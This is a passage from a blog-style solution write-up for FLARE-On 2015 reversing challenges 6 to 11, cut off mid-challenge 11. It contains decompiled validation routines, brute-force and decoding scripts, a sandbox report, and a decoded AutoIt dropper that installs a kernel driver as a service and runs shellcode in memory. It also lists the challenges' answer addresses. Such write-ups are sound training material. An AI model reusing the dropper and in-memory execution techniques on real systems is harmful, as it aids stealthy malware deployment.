Beyond that, I have no clue what this function is doing. I know what I've been told it's doing, I've read other people's explanations of it, and even had someone afterward sit down and walk me through it. Nope. Still no clue. I do believe that the brain is sometimes 'color blind' to things it shouldn't be, and this challenge fell within that for me.

After spending a month poking at this on almost a daily basis, I had mentally given up. The answer eventually came to me and, upon completion on 28 Aug, I even made a public joke about this based on the time durations of my challenges :)

Dat Gap Doe :D

After a week of trying to reimplement the routine in Python, I gave up. There was just too many unknowns to deal with with Python's limited type casting, when you don't know what the intent of the code is. I needed to know what the expected outputs should look like. Therefore, I attempted to debug it using various local Android virtual machines. I first tried to use GenyMotion which failed as they removed all ARM support. I then switched to BlueStacks. However, that has a 'broken' NAT implementation that only allowed outgoing traffic. And AndyVM kept crashing on a regular basis when making connections.

From there, I installed the IDA server on my own HTC One M7, which worked, but I then ran up against IDA Pro issues:




At this point, I was greatly urged to recreate the routine in C++, which I'm very weak at. I spent a few days trying to adapt to GCC, then gave up again.  It wasn't until someone noted that they had the code completely reimplemented that I learned you could just use Visual Studio, include 'windows.h', and have functional IDA decompiler code. I quickly installed VS2015, then worked to reimplement the routine, with a simple brute force wrapper that I stole from the Internet. I tested it out, running a set of two bytes and writing the block to the disk, comparing to the check tables. The structures checked out. More debugging helped show what was going on, to an extent.

For each run, I would copy one of the 23 check tables into the code, brute force it, and add that to my output email. This was made easy with the HxD hex editor as you can simply highlight a block of text and "Copy As C#", automatically formatting it for source code.



// FLARE6.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "stdio.h"
#include "windows.h"

staticconstcharalphabet[]="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-.=!#$%+@";
staticconstintalphabetSize=sizeof(alphabet)-1;

constunsignedcharrawData[92]={
0x00,0x00,0x00,0x00,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};


unsignedchartable[6952]={
0x02,0x00,0x03,0x00,0x05,0x00,0x07,0x00,0x0B,0x00,0x0D,0x00,
0x11,0x00,0x13,0x00,0x17,0x00,0x1D,0x00,0x1F,0x00,0x25,0x00,
0x29,0x00,0x2B,0x00,0x2F,0x00,0x35,0x00,0x3B,0x00,0x3D,0x00,
// Truncated for brevity
0x2B,0x7E,0x2F,0x7E,0x35,0x7E,0x41,0x7E,0x43,0x7E,0x47,0x7E,
0x55,0x7E,0x61,0x7E,0x67,0x7E,0x6B,0x7E,0x71,0x7E,0x73,0x7E,
0x79,0x7E,0x7D,0x7E
};


voidvalidate(constchar*email)
{
chara7E7E[1];// I dunno?
chars[6952];
intbyte1=0;
inti=0;
inttable_pos=0;
inttable_value=0;

memset(s,0,3476);
memset(a7E7E,0,1);

if(email[i])
{
byte1=email[i];
if(email[i+1])
byte1=(unsignedint)&a7E7E>=((email[i]<<8)|email[i+1])?(email[i]<<8)|email[i+1]:0;
}

do
{
table_value=*(WORD*)((char*)&table+table_pos);

while(!(byte1%table_value&0xFFFF))
{
++*(WORD*)&s[table_pos];
byte1=byte1/table_value&0xFFFF;
if(byte1<=1){gotoLABEL_10;}
}
table_pos+=2;
}while(table_pos!=6952);

LABEL_10:

if(!memcmp(&rawData,s,92)){printf("%c%c\n",email[i],email[i+1]);}
return;
}

voidbruteImpl(char*str,intindex,intmaxDepth)
{
for(inti=0;i<alphabetSize;++i)
{
str[index]=alphabet[i];
if(index==maxDepth-1){validate(str);}
else{bruteImpl(str,index+1,maxDepth);}
}
}

intmain()
{
chara[2];
bruteImpl(a,0,2);
return0;
}

After running through each set of characters I obtained the email address:

Should_have_g0ne_to_tashi_$tation@flare-on.com


Filename Etymology: android.apk / libvalidate.so
Oh, come on!  an_arm_and_a_leg? rockets_armed? Give us something.

Challenge #7

With #6 done, I first took a break to cry tears of relief into a bottle of bourbon. With two weeks left I had low expectations for finishing and so decided to have fun with the rest of the challenges.

Challenge 7 was another console application where you were to enter in a valid password (clue there, not an email). The trick here is that it is a .NET application.

Loading it into ILSpy/Reflector shows initially that there is encoding of some sort: the function names are all junk unicode names.



Running the file through de4dot produces output that is much more usable for analysis.

Like some of the later challenges, we see a lot of excessive junk here. There are five namespaces, 
each containing multiple attributes and classes. For now, ignore the attributes and focus on the handful of class files. Of those, one stands out as relevant:



namespacens2
{
usingns1;
usingSystem;
usingSystem.IO;
usingSystem.Reflection;
usingSystem.Security.Cryptography;
usingSystem.Text;

internalclassClass3
{
/* private scope */staticvoidMain(string[]args)
{
Class1class2=newClass1();
MD5.Create();
byte[]buffer=newbyte[]{0xec,0x35,0xdd,0x8f,0xb3,0xd9,0xcb,0x17,0x57,0x7e,40,0x41,0x42,230,0x98,180};
byte[]buffer2=newbyte[]{
0x1f,100,0x74,0x61,0,0x54,0x45,0x15,0x73,0x61,0x6d,0x1d,0x4f,0x44,0x15,0x68,
0x73,0x68,0x15,0x54,0x4e
};
byte[]bytes=newbyte[]{"Warning! This program is 100% tamper-proof!"};
byte[]buffer4=newbyte[]{"Please enter the correct password:"};
byte[]buffer5=newbyte[]{"Y U tamper with me?"};
byte[]buffer6=newbyte[]{"Thank you for providing the correct password."};
byte[]buffer7=newbyte[]{"Use the following email address to proceed to the next challenge:"};
Console.WriteLine(Encoding.ASCII.GetString(bytes));
Console.Write(Encoding.ASCII.GetString(buffer4));
stringstr=Console.ReadLine().Trim();
stringstr2=smethod_0(class2,buffer2)+'_'+smethod_3();
if(str==str2)
{
Console.WriteLine(Encoding.ASCII.GetString(buffer6));
Console.Write(Encoding.ASCII.GetString(buffer7));
Console.WriteLine(smethod_1(str,buffer));
}
else
{
Console.WriteLine(Encoding.ASCII.GetString(buffer5));
}
}

/* private scope */staticstringsmethod_0(Class1class1_0,byte[]byte_0)
{
byte[]buffer=smethod_2();
stringstr="";
for(inti=0;i<byte_0.Length;i++)
{
str=str+((char)(byte_0[i]^buffer[i%buffer.Length]));
}
returnstr;
}

/* private scope */staticstringsmethod_1(stringstring_0,byte[]byte_0)
{
RijndaelManagedmanaged=(RijndaelManaged)Rijndael.Create();
byte[]buffer=newbyte[]{
0x1a,0xcb,20,0x9c,0xc4,15,0x38,0x5e,0x77,0xe3,0x31,0x42,0x24,0xfc,0x92,0xc3,
0x77,80,0xdf,0x67,0xfb,240,0x3d,0x27,10,0x16,150,0x8e,0xa2,0xa7,100,0x99
};
byte[]bytes=newRfc2898DeriveBytes(string_0,byte_0.Length){Salt=byte_0}.GetBytes(0x20);
managed.IV=newbyte[0x10];
managed.Key=bytes;
managed.Mode=CipherMode.CBC;
managed.Padding=PaddingMode.ANSIX923;
RijndaelManagedTransformtransform=(RijndaelManagedTransform)managed.CreateDecryptor(managed.Key,managed.IV);
MemoryStreamstream=newMemoryStream(buffer);
CryptoStreamstream2=newCryptoStream(stream,transform,CryptoStreamMode.Read);
StreamReaderreader=newStreamReader(stream2);
stringstr=reader.ReadToEnd();
stream.Close();
stream2.Close();
reader.Close();
returnstr;
}

/* private scope */staticbyte[]smethod_2()
{
returnAssembly.GetExecutingAssembly().ManifestModule.ResolveMethod(0x6000001).GetMethodBody().GetILAsByteArray();
}

/* private scope */staticstringsmethod_3()
{
StringBuilderbuilder=newStringBuilder();
MD5md=MD5.Create();
foreach(CustomAttributeDatadatainCustomAttributeData.GetCustomAttributes(Assembly.GetExecutingAssembly()))
{
builder.Append(data.ToString());
}
byte[]bytes=Encoding.Unicode.GetBytes(builder.ToString());
returnBitConverter.ToString(md.ComputeHash(bytes)).Replace("-","");
}
}
}


From this routine a few things pop out. A call to Console.Readline().Trim() takes in the password from the user. Immediately after, calls to smethod_0() and smethod_3() are performed with the results separated by an "_". If these match the input, you get the email. These functions also all take place within the same class, so we can ignore the remaining files.

One problem here is that part of the answer relies upon the metadata of the executable, a big block of metadata stored elsewhere in the file. Here's the original view of this data:




De-obfuscating the executable changes that block, so the resultant values will be completely different.



You can only work off the original. And that's not easy to do statically, nor with ILSpy.

Instead, we'll use dnSpy, which makes the solution almost effortless. In it we can simply look for the string builder with the underscore and the comparison immediately afterward:



Now, just debug. Step through the program until you get to this comparison, mouseover text2, and get your password



metaprogrammingisherd_DD9BE1704C690FB422F1509A46ABC988

Boom!



Re-run the program, type that in, and get your email!



Justr3adth3sourc3@flare-on.com

Filename Etymology: YUSoMeta
Why are you so meta? The application relies on the metadata stored within the executable. 

Challenge #8


Challenge 8 was steganography, something that eluded many early in the challenge. The easy part of stego is having a wide selection of tools available. The hard part is knowing when to use them or not. I cannot even express the anguish over Robert Hanssen's actions and certain sectors of the forensic community having to use AnaDisk on every. single. floppy. disk. they processed. (In my knowledge, there were no positive results from trying it on every single investigation).

The challenge started with a plain executable, gdssagh. While it prints a single message to the screen, it almost entirely contains a single stream of Base64 encoded data. Extracting this data, removing the carriage returns, and decoding results in a pretty picture.



From that point, I just throw tools at it :)  Honestly, if you're looking at what could be steg, your first stops should be StegSolve and ZSteg. StegSolve allows you to manually manipulate the data until you see what could be hidden data. It acts as a good first pass of the data, especially when viewing color planes.

A color plane is a sliced view of an image solely off of the bit of a single color. What would an image look like if you only saw the Most Significant Bit of Green? This:



The story comes out when we look at the Least Significant Bits (shown here of each color):




At a basic level, this tells us where the data "is" for a certain bit plane. In the LSB, we see a significant black area at the top. These black areas show "no value" (null) bytes. From knowing an executable structure, you can make a fairly good guess that one is in there. At a close enough view, you could imagine picking out the MZ, This Program Cannot Be ..., and PE headers. With that, I play with StegSolve's Data Analyzer and focus on the LSB planes for red, green, and blue (since all had the same data structure):



Close. Let's try MSB first (basically switching the bit order) ... I get the same results? I try again, and again with different files. It's a bug in the tool.



I hop over to ZSteg which, when executed, immediately finds our executable :) It detected it as data on RGB planes, MSB first, on an X>Y orientation.



But, that StegSolver bug really got on my nerves. I dumped the output and then just changed the bit pattern myself, with more stolen internet code:


defreverse(x):
result=0
foriinxrange(8):
if(x>>i)&1:result|=1<<(8-1-i)
returnresult

data=open('stegsolver.out.dat','rb').read()
output=''

foriindata:
output+=chr(reverse(ord(i)))

printoutput[0:4]
open('correct.exe=','wb').write(output)


And, that worked! I received a file with the same MD5 hash as ZSteg produced. Stupid bug... When executed, this program spat out the email:


Im_in_ur_p1cs@flare-on.com



Filename Etymology: gdssagh
Is there a meaning to this? It just appears as drunken keyboard walking. I'm thinking it's an internal term, likely a password for an APT campaign (because they never keyboard walk, lol).

Challenge #9


Now, we get to the harder challenges. This is where I can show my true ghetto analysis attitude! And where I start taking studious notes on everything. I have a week left to get three more challenges done, so the pressure is on.

And let's start off with a backhanded compliment of a program.



Followed by a look at some instructions and then a big sea of data.


LOLWUT?



I really dislike the IDA debugger (I'm heavily reliant on Right Click>Follow in Dump) but it's best for this challenge. There's a lot of code to get through and most of it useless and, for me, IDA does a better job of recognizing and assembling this code as you step along.

The first goal is to focus on the actual input portion in all of that. So, let's run it in the debugger, then step through until we get to the input. Set a breakpoint after that part, type in some unique junk ('ABCD_1234_ABCD_1234@flare-on.com'). Then start a debugger trace with Instruction Tracing. Then, hit F9, and relax.

This trace output contained 9,600 instructions. Not bad. Not easily readable either. Let's channel our inner Unix admin. I'm at an advantage: I work from home, I've already started growing out my neck beard.



Wait, what? Where am I going with all this ... We're looking for loops. We're looking for the same instructions to be called with varying registers. We've seeded the registers with somewhat unique values. I'm hoping to find a mov, xor, cmp, or something usable.

A first pass shows that there are no EAX = 00000031 or 00000065. After digging a little deeper, I see it:


I know that at 0x401A9C each respective byte is loaded into AL. Let's then poke around for any single-byte XOR's with 'grep' (Are you cringing at this process yet? I know you are. And I like that.)



Boom! So at 0x012FDF8 are calls regarding single-byte XOR. This may not even be relevant, but I like to just log this stuff as I see it. While we're at it, let's hunt for any other math routines:



We know from our input breakpoint that the program picks up around 0x40173B. I can see that also as the top of a loop. Based on that, I can search through the trace to find the bottom of the loop that causes a jz/jnz back to there. I see that at 0x401BC8. So now we have a fairly confined boundary to focus on.

Since we see the routine looping, we can sort-of conclude that it's not exiting if a byte is wrong. Based on this, can we determine the overall email length? Let's try.

Run a new trace with a unique and long "email". For this test, I'll use:

ABCDEFGHIJLKMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz

Because we know each character is unique, and we know the location, we can run a simple:



At 41 bytes it stops checking bytes, so we have a pretty high fidelity guess to the email length. The only reason I do a sort | uniq here is that the results are repeated twice, for some reason. So they show up as 82 bytes (two checks of 41 bytes each).

At this point, I'll follow the code from AL all the way down to see what happens to it.

.text:00401A9C mov     al, [eax+ecx]
Stack[000007B0]:0012FDF4 mov     ah, [esp+ebx+0B4h]    ; XOR key as AH
.text:00401B14 rol     al, cl                          ; ROL key as CL
.text:00401B16 mov     ebx, [esp+ebx+2Ch]              ; Load cmpxchg value into EBX
Stack[000007B0]:0012FDF8 cmpxchg bl, dl


That last exchange, cmpxchg, was elusive to discover. When debugging, IDA would never display this opcode properly, nor the hex bytes around it, shown here at address 0x12FDF8:



I knew something was happening here, but could not determine exactly what. So, I switched to Immunity and saw the operation jump out:



At the very end, the respective input byte, performed with these operations, would be compared to a static table using cmpxchg. Knowing this, I think of all the possible ways to collect these values and map them out. Then I thought of the worst way possible... spreadsheets!

Yes. I loaded an Excel spreadsheet and, for each byte, marked the XOR byte, ROL byte, and ultimate CMPX value. Is that a look of disgust I see? Oh yeaaahh



Once the routine was discovered, that was about 5 minutes to collect, reverse, and decode the email of:

Is_th1s_3v3n_mai_finul_foarm@flare-on.com



Filename Etymology: you_are_very_good_at_this
Other than a possible backhand compliment, especially when combined with input text, there's no real idea behind this.


Challenge #10


Challenge 10 had a lot of different things going on but, at the end, it came down to a few small gimmick hurdles. Let's get to them one at a time. You're given an executable, loader. When executed it does quite a few things as I'll show in my awesome tool that's on Github and you should contribute to and I totally gave a demo on it at BlackHat 2015 Arsenal, Noriben.


-=] Sandbox Analysis Report generated by Noriben v1.6.2
-=] Developed by Brian Baskin:brian @@ thebaskins.com @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben

-=] Execution time:28.18 seconds
-=] Processing time:0.20 seconds
-=] Analysis time:4.90 seconds

Processes Created:
==================
[CreateProcess]Explorer.EXE:1824 > "C:\FLARE\loader.exe " [Child PID:2700]
[CreateProcess]loader.exe:2700 > "%WinDir%\system32\ioctl.exe 22E0DC" [Child PID:3412]

File Activity:
==================
[CreateFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut1.tmp [File no longer exists]
[CreateFile]loader.exe:2700 > %WinDir%\system32\challenge.sys [MD5:399a3eeb0a8a2748ec760f8f666a87d0] [VT:0/57]
[DeleteFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut1.tmp
[CreateFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut2.tmp [File no longer exists]
[CreateFile]loader.exe:2700 > %WinDir%\system32\ioctl.exe [MD5:205af3831459df9b7fb8d7f66e60884e] [VT:0/57]
[DeleteFile]loader.exe:2700 > %UserProfile%\Local Settings\Temp\aut2.tmp

Registry Activity:
==================
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Type = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Start = 3
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\ErrorControl = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\ImagePath = \??\C:\WINDOWS\system32\challenge.sys
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\DisplayName = challenge
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Security\Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\0 = Root\LEGACY_CHALLENGE\0000
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\Count = 1
[RegSetValue]services.exe:720 > HKLM\System\CurrentControlSet\Services\challenge\Enum\NextInstance = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\Class = challenge
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\NoDisplayClass = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\NoUseClass = 1
[RegSetValue]System:4 > HKLM\System\CurrentControlSet\Control\Class\{DDEEAAFF-1337-BEEF-8877-665511223344}\Properties\Security = 01 00 0C 90 00 00 00 00 00 00 00 00 00 00 00 00

At a high level, loader.exe is run as PID 2700. It drops aut1.tmp and aut2.tmp to %Temp%. After each, an immediate file is created in C:\Windows\System32. Respectively, challenge.sys and ioctl.exe.  Then, a service is created (shown as services.exe:720 as the source) to create a service named "challenge" to point to that challenge.sys.  We also then see a new Class created for that service. Finally, loader runs "ioctl.exe" with the argument of 22E0DC.

And those [VT 0/57] ratings? Come on people, you upload your challenges to VirusTotal? That should be an automatic disqualification.

Upon loading loader into IDA, we quickly see that it's the wrong way to go about this:


It's an AutoIt executable, for which there will be an encoded, embedded script. These are automatically extracted with aut2exe.exe, which will produce a script that begins with a few hundred lines of code for service management. Discard these; they're generic and copy pasted from elsewhere. Focus below that:


If@OSArch<>"X86"Then
MsgBox(0,"Unsupported architecture","Must be run on x86 architecture")
Exit
EndIf
If@OSVersion="WIN_7"Then
FileInstall("challenge-7.sys",@SystemDir&"\challenge.sys")
ElseIf@OSVersion="WIN_XP"Then
FileInstall("challenge-xp.sys",@SystemDir&"\challenge.sys")
Else
MsgBox(0,"Unsupported OS","Must be run on Windows XP or Windows 7")
Exit
EndIf
FileInstall("ioctl.exe",@SystemDir&"\ioctl.exe")
$nret=dothis("0x96c581bc009905e76931875a583f97a738b764eb67f35c802194bf86123b943d1907619488a31a26cf29ba5f5e57ed5c5a37cb5d67dc2020a7e6d55cadefba32aba3ed77f0e18e41a571e74a8a7614a895d7c8827c46028761994543bf449138c65a6e7b5039792c85be5b4998c9950d2497f73cd88d186a6bffe3634bd250ec59e2","flarebearstare")
If$nretThen
Ifdothis("0x96d587b8139933d17e3598505e729da736bb66aa6cfa5180289fb6845530","flarebearstare")Then
dothis("0x9aee96b50da818d16f368556131aecfc69ef21a440f24fcc6bd1f3bd1e76db69574a6c8d81ed53688a7eaa364e53fd0700","flarebearstare")
EndIf
EndIf

Funcdecrypt($data,$key)
Local$opcode="0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local$codebuffer=DllStructCreate("byte["&BinaryLen($opcode)&"]")
DllStructSetData($codebuffer,1,$opcode)
Local$buffer=DllStructCreate("byte["&BinaryLen($data)&"]")
DllStructSetData($buffer,1,$data)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($codebuffer),"ptr",DllStructGetPtr($buffer),"int",BinaryLen($data),"str",$key,"int",0)
Local$ret=DllStructGetData($buffer,1)
$buffer=0
$codebuffer=0
Return$ret
EndFunc

Funcdothis($data,$key)
$exe=decrypt($data,$key)
$exe=BinaryToString($exe)
ReturnExecute($exe)
EndFunc


This is pretty straight forward. If Win7, drop this, if XP, drop that, otherwise do nothing. Beyond the dropping we see calls of hex strings to "dothis()" with a second argument of "flarebearstare". dothis() simply passes this along to decrypt() and executes the result. decrypt() is the odd ball out, taking a big string of shellcode and throwing it up into memory.

For now, extract the shellcode, convert to hex, save to file, and open in IDA (which is like three key presses with WinHex, just saying).



A 256 count loop to build an array with byte swapping, followed by a whole other loop that XOR's based on that array? My money's on RC4. Let's whip up a quick Python script with the encoded values and check:


fromCrypto.CipherimportARC4ascipher
strings=('96D587B8139933D17E3598505E729DA736BB66AA6CFA5180289FB6845530','9aee96b50da818d16f368556131aecfc69ef21a440f24fcc6bd1f3bd1e76db69574a6c8d81ed53688a7eaa364e53fd0700','96c581bc009905e76931875a583f97a738b764eb67f35c802194bf86123b943d1907619488a31a26cf29ba5f5e57ed5c5a37cb5d67dc2020a7e6d55cadefba32aba3ed77f0e18e41a571e74a8a7614a895d7c8827c46028761994543bf449138c65a6e7b5039792c85be5b4998c9950d2497f73cd88d186a6bffe3634bd250ec59e2')
forstrinstrings:
dec=cipher.new("flarebearstare")
print(dec.decrypt(str.decode('hex')))


This results in the output of:

_StartService("", "challenge")
ShellExecute(@SystemDir & "\ioctl.exe", "22E0DC")
_CreateService("", "challenge", "challenge", @SystemDir & "\challenge.sys", "", "", $SERVICE_KERNEL_DRIVER, $SERVICE_DEMAND_START)

Nice!  Fill back into our original script to get:


If@OSArch<>"X86"Then
MsgBox(0,"Unsupported architecture","Must be run on x86 architecture")
Exit
EndIf
If@OSVersion="WIN_7"Then
FileInstall("challenge-7.sys",@SystemDir&"\challenge.sys")
ElseIf@OSVersion="WIN_XP"Then
FileInstall("challenge-xp.sys",@SystemDir&"\challenge.sys")
Else
MsgBox(0,"Unsupported OS","Must be run on Windows XP or Windows 7")
Exit
EndIf
FileInstall("ioctl.exe",@SystemDir&"\ioctl.exe")
$nret=Exec(_StartService("","challenge"))
If$nretThen
IfExec(ShellExecute(@SystemDir&"\ioctl.exe","22E0DC"))Then
Exec(_CreateService("","challenge","challenge",@SystemDir&"\challenge.sys","","",$SERVICE_KERNEL_DRIVER,$SERVICE_DEMAND_START))
EndIf
EndIf
Yup, that was a pretty bit of work for such non-climatic results. I'm bored. Let's go look at ioctl.exe.



Welp, that was equally boring. Take a hex value as arg1, pass it along to DeviceIoControl as dwIoControlCode, where the hDevice (v7) is the "FileName" of \\.\challenge. So, take an arg and pass it to a memory-existent driver. Check.

Because I'm not a glutton for punishment on non-Fridays, I would typically focus on the XP driver for the rest. However, there's a glitch with that. The dwIoControlCodes in the XP are shown as as WORD values while the Windows 7 driver shows as proper DWORDs:



They both have the same functionality so for static analysis the Win7 driver may be more appropriate to use. There are a few things you should see with these drivers. There are 199 referenced functions. Typically, then, I'd sort functions by size and look at the smallest, then the largest. The largest are more fun here...



It's ... so beautiful. m0n0sapiens put it most succinctly:


Or, in a more disco groove:


If you follow the big three functions you'll see that all three end with data pushed into the same function, that feeds into this:



As with any unusual math routine that may be encoding, look for seed values and Google them. In this case, you'll see it referenced as XTEA (eXtended Tiny Encryption Algorithm), a well known routine. At the end of each of those three routines is a buffer passed into this decryptor. But, how are each called?

In this case, there is a single subroutine with a switch statement of 101 cases, each a DWORD value. If we find the one used by the dropper we see it pointing to the large "Triangle" routine. I'll point it out below along with the other three large ones (which I'll name Parse1, Parse2, and Parse3). I've modified this image to remove cruft:



Here we see the code sent from the dropper: 22E0DC, which points to that massive triangle function. Others have written up details of this function and how it works. I skipped it. It had no meaningful calls from it and wasn't related to the XTEA decryption routine, so I put it on the backburner.

I focus on the XTEA and work back. For each Parse routine this decryptor is called with a buffer of data and a buffer size. That size is slightly obfuscated just because it is set at the very beginning in a mess of other values. I'll do some magic photoshopping to demonstrate these.



Parse1() calls the decryptor with a 40 (0x28) byte buffer while the other two call it with an 80 (0x50) byte buffer. Each buffer is made up of individual global bytes that are created from subroutines underneath each Parse() routine. The obvious and professional route is clear from a static perspective. Follow the xref's back from each byte, grab the value, and populate it into the binary.

That's what others did. That's not how I roll. Let's do this live in a debugger. Our hurdle here is to attach to a device driver in memory. That would typically involve using WinDbg at a kernel level, which I do not know how to do (it's on my bucket list, trust me, right below base jumping in South America). I don't need to run it properly, I just need to throw it in memory for me to mess with.

So, I use CFF Explorer to modify the PE header, change the Subsystem to a DLL, and save it. I then debug rundll32.exe with an argument calling this new "DLL". It works!



I take the entry point as it appears in the debugger (0x9C0000) and rebase IDA. Now I can directly see where changes and calls are made. However, as I quickly learn, I have many errors in actually running this. The memory segments that it is loaded in are Executable only. So, in Immunity, switch to the memory map view and just set them all as Full Access.  (Didn't I warn you about how ghetto I was going to make this? You haven't seen anything yet!)



I throw calls to the three Parse() routines and notice that Parse1() ends with a blank buffer. Passing it into TEA fills it with garbage. I try to place data into the buffer, different junk comes back. This must be an INOUT buffer. But it's not populated at all. I trace the calls to populate these bytes back, set a few breakpoints, and see that they're never called. There are 40 conditions that are never met. From a debugger POV I can now try to change those conditions, or BP at each and change the Z flag. Or I can make ghetto calls (my personal favorite).

While in ntoskrnl space, just because I was arbitrarily sitting there, I pull the xref from each subroutine in IDA and just ... call them. One at a time. And watch the buffer fill. You can ghetto call because there are no arguments to pass in and no results back. It doesn't break the stack ... much.



I then call Parse1(), track it to the end, make the call, and get my email address:


unconditional_conditions@flare-on.com

You cringe at how I did that, but I got it done in just a few hours, so phooey on you.

Filename Etymology: loader / challenge-7.sys / challenge-xp.sys
I am disappoint. How about: driving_mr_pythagoras? dantes_inferno? Let's brainstorm this, people.


Challenge #11


This is the final challenge and it shows. With the exception of the issues with #6, this sample took me the longest out of all challenges from this year and last. There is a lot going on. And, being honest, the other write-ups will explain this challenge much better than I and will provide more professional answers. Read at your own risk.

The executable, CryptoGraph, contains fairly customized encryption that is seeded by a command line argument to decrypt an embedded resource into, ultimately, a JPG. For one, I'm glad they used JPG so that we could avoid the whole GIF vs JIF debate.

Part One of this challenge is processing the command line argument directly against embedded data to produce a new set of data. This data will vary based on the argument passed and how many times it had to verify the data contents.

Part Two takes the results of Part One to seed an RC5 decryption of another embedded resource to the disk.

This seems fairly straightforward. We can brute force the command line options until we get a JPG. This is quite similar to the final challenge last year. However...


  1. The runtime duration of this application is approximately 15-20 hours.
  2. Even with the correct command line argument, the correct number of data loops needs to be determined. Running to the end will produce a garbage JPG.


Knowing that, I can see where people can write debugger scripts to fuzz registers or values at certain points. But, I have my limitations. I'm going straight in through the front door. That begins, however, with understanding what's going on. Therefore I spend a few days doing nothing but debugging, following traces, and keeping notes. A LOT of notes.



Based on such notes, I'm proud to share one of the worst ways possible of finishing this challenge successfully.

For one, now that I've read other write-ups, I feel foolish in missing one of the very first checks for a null value at 0x401714. Instead, I focused far past that. The issue here is that there are three distinct ways to view code in IDA: hex view, graph view, and decompiler view. Due to the sheer size of many functions I remained in hex view and decompiler view. However, as others learned during this challenge, graph view made it very easy to track unusual jumps past certain areas that should be reached. There's a learning lesson.

When checking for the first argument there is an early loop where the correct argument will match a value from the embedded resource and then skip to the rest. If it doesn't match, a global integer (which I've named Data_Checks) is incremented, and the process continues.

Past this is the main loop of the program, shown below, that repeats 32 times. Each time, the speed becomes slower and slower, based on the v16 value passed into Core_Decoding_Loops(), which often numbers in the millions.


do// Main Loop
{
v16=*(v15-44)+v31[398]*(result>>4);
v31[398]=v16;
create_16byte_key(&v32);
MD5_Chunks(&v32,(v15-40),8);
MD5_chunk_and_byteswap(&v32,&v36);
Core_Decoding_Loops(&v34,&v36,v17,(v15-40+8),v17,v16,1);
memcpy_s(&Dst,16u,&v34,16u);
v18=v30;
v25=v30+v31[5];
v26=2*v25+2;
v24=Malloc(4*v26|-(v26>>30!=0));
if(v24)
{
EQUATION_RC6_Setup(&v24);
EQUATION_RC6(&v24,&Dst,16);
}
RoundNum_of32=v18+1;
loop48_round=v27+1;
v29=v18+1;
do
{
Loop1_48(&v24,v15,v15,48,&RoundNum_of32);
--loop48_round;
}
while(loop48_round);
if(*v15==v18)
{
create_16byte_key(&v32);
MD5_Chunks(&v32,v15,32);
MD5_chunk_and_byteswap(&v32,&v35);
v20=(v15+32);
v21=12;
v22=&v35;
while(*v22==*v20)
{
v22+=4;
++v20;
v13=v21<4;
v21-=4;
if(v13)
gotoLABEL_24;
}
}
++Data_Checks;
LABEL_24:
if(v24)
j__free(v24);
v15+=48;
result=RoundNum_of32;
v23=__ROL4__(v27,1);
v30=RoundNum_of32;
v27=v23;
}
while(RoundNum_of32<32);


There are a few references to incrementing Data_Checks and I tried my hardest to make sure the flow got to that value. After every loop that number incremented, which I took to be a good thing. (Spoiler Alert: It wasn't).

For example, in this flow graph, I continually tried to follow the cyan (blue) lines leading to Data_Checks.



After following all of the logic at this point, things started to make sense. The continual iterations were due to data not being found at certain offsets of the resource during each round of modifications. There appeared to be at least one exit condition on the loops that would prevent continuous processing at certain points. A proper command line argument should make the data shift correctly to break out of  such loops and speed up code execution. But, how do we test that theory?

There are many proper ways of doing it. Instead, here was mine: Find the slowest computing procedure and, after complete, patch the program to quit. Then brute force and see which number makes it end the soonest. For this, I chose to end immediately after that Core_Decoding_Loops(). Through standard execution, getting from the beginning and past that loop with an arbitrary argument would take two minutes. That sounded like a good spread. I went to the instruction after that call, used Immunity to change the code to "call _cexit" and patched the resulting bytes into the executable.

I wrote a quick Python script to brute force the numbers, timing out any process longer than 60 seconds, and waited.


importsubprocess
seconds=60

